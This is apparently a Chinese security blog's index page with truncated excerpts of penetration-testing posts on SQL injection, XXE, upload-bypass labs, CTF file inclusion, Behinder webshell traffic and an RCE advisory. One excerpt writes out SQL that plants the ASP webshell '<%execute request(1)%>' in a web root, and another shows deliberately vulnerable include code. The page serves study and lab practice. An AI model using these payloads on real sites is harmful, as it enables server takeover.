渗透技巧

WEB安全

统信安装wine9.1支持exe64位运行环境

安装命令如下: git clone https://gitee.com/winehq/wine.git git checkout wine-9.1 安装依赖 sudo apt install libwayland-dev sudo apt install libpcsclite-dev sudo apt install libsane-dev sudo……

漏洞空间 2024-05-31

0 1
其他工具

sqlmap在匿名管道中报using ‘STDIN’ for parsing targets list

如图所示: 解决：通过跟踪断点信息，发现有个config的参数conf.stdinPipe的值和直接在shell中执行命令行的值不一致，所以在sqlmap的源码的lib/core/option.py 中的init()方法中设置conf.stdinPipe=None后解决了……

漏洞空间 2024-04-28

0 0
CMS漏洞

CVE-2020-19961(zzcms存在sql注入漏洞)

zz cms 2019 subzs.php 存在sql注入漏洞文件对应路径: zs/subzs.php 注入漏洞存在位置: 在showcookiezs函数中，第十六行sql语句将cookie中接收的zzcmscpid没闭合直接拼接查找调用showcookiezs的函数，在fix函……

漏洞空间 2024-01-23

0 0
WEB安全

access数据库导出数据表内容到根目录

创建表a1字段b create table a1(b text) 像表a1字段b里面写入数据 insert into a1 (b) values('<%execute request(1)%>') 把写入的数据导出到D:\web\11.asp SELECT b into [<%execute request(1)%>] i……

漏洞空间 2023-11-24

0 0
WEB安全

冰蝎4.0流量分析及魔改

冰蝎4.0流量分析及魔改 0x00 前言冰蝎v4.0开放了传输协议的自定义功能，使得流量魔改更为简单方便，本文以jsp脚本类型为例，提供一些冰蝎4流量魔改的方式 0x01传输协议分析冰蝎4内置了如下几种传输协议，传输协……

漏洞空间 2023-08-19

0 0
WEB安全

XXE漏洞之解决读带特殊字符的文件无回显问题

无回显读取本地敏感文件(Blind OOB XXE) xml.php（保存当根目录如127.0.0.1/xml.php） <?php libxml_disable_entity_loader (false); $xmlfile = file_get_contents('php://input'); $dom = new DOMDocume……

漏洞空间 2023-05-31

0 0
WEB安全

【文件上传绕过】解析漏洞_.htaccess文件解析漏洞

一、实验目的： 1、了解什么是.htaccess文件。 2、通过upload-labs闯关游戏(Pass-04)，掌握.htaccess文件解析漏洞技术。二、工具： cmd命令行火狐/谷歌浏览器三、实验环境：靶机： windows10虚拟机：192.168……

漏洞空间 2023-05-13

0 0
WEB安全

【文件上传绕过】–二次渲染漏洞

一、实验目的： 1、通过实验学习二次渲染原理的成因。 2、通过搭建漏洞环境，学习绕过技巧。二、漏洞说明： 1. 二次渲染原理： 1、配合文件包含漏洞：将一句话木马插入到网站二次处理后的图片中，也就是……

漏洞空间 2023-05-13

1 0
WEB安全

CTF中关于文件包含漏洞

<?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 场景描述：我们在审计时找到一处文件包含漏洞（使用require_once或include_……

漏洞空间 2023-05-05

0 0
CMS漏洞

某应用虚拟化系统远程代码执行

漏洞简介微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day)，攻击者可以通过该漏洞执行任意代码，导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构……

漏洞空间 2023-04-25

0 0